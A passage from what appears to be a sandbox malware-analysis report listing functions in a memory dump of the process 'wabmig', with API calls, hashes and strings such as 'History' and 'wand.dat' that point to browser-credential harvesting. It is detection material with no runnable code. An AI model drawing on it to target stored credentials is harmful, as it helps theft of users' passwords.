                                                                            • memset.MSVCRT ref: 0044A6FB
                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: gj
                                                                            • API String ID: 1297977491-4203073231
                                                                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                            Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                            • free.MSVCRT ref: 0040E9D3
                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$free
                                                                            • String ID:
                                                                            • API String ID: 2241099983-0
                                                                            • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                            • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                            Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                            • malloc.MSVCRT ref: 004174BD
                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                            • free.MSVCRT ref: 004174E4
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                            • String ID:
                                                                            • API String ID: 4053608372-0
                                                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                            Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 0040D453
                                                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                            • String ID:
                                                                            • API String ID: 4247780290-0
                                                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                            Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                            • memset.MSVCRT ref: 004450CD
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                            • String ID:
                                                                            • API String ID: 1471605966-0
                                                                            • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                            • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                            Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcscpy.MSVCRT ref: 0044475F
                                                                            • wcscat.MSVCRT ref: 0044476E
                                                                            • wcscat.MSVCRT ref: 0044477F
                                                                            • wcscat.MSVCRT ref: 0044478E
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                            • String ID: \StringFileInfo\
                                                                            • API String ID: 102104167-2245444037
                                                                            • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                            • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                            Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                            Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _memicmpwcslen
                                                                            • String ID: @@@@$History
                                                                            • API String ID: 1872909662-685208920
                                                                            • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                            • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                            • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                            • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                            Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004100FB
                                                                            • memset.MSVCRT ref: 00410112
                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                            • _snwprintf.MSVCRT ref: 00410141
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                            • String ID: </%s>
                                                                            • API String ID: 3400436232-259020660
                                                                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                            Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040D58D
                                                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                                            • String ID: caption
                                                                            • API String ID: 1523050162-4135340389
                                                                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                            Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                            • String ID: MS Sans Serif
                                                                            • API String ID: 210187428-168460110
                                                                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                            Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcsicmpmemset
                                                                            • String ID: edit
                                                                            • API String ID: 2747424523-2167791130
                                                                            • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                            • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                            • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                            • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                            Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                            • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                            • API String ID: 3150196962-1506664499
                                                                            • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                            • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                            • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                                            • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                            Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memcmp
                                                                            • String ID:
                                                                            • API String ID: 3384217055-0
                                                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                            Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$memcpy
                                                                            • String ID:
                                                                            • API String ID: 368790112-0
                                                                            • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                            • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                            Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                              • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                              • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                            • GetMenu.USER32(?), ref: 00410F8D
                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                            • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                            • String ID:
                                                                            • API String ID: 1889144086-0
                                                                            • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                            • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                            • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                            • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                            Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                            • GetLastError.KERNEL32 ref: 0041810A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                            • String ID:
                                                                            • API String ID: 1661045500-0
                                                                            • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                            • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                            • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                            • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                            Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                            • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                            Strings
                                                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                            • API String ID: 1297977491-2063813899
                                                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                            Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040560C
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                            • String ID: *.*$dat$wand.dat
                                                                            • API String ID: 2618321458-1828844352
                                                                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                            Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                            Download Yara Rule
                                                                            APIs
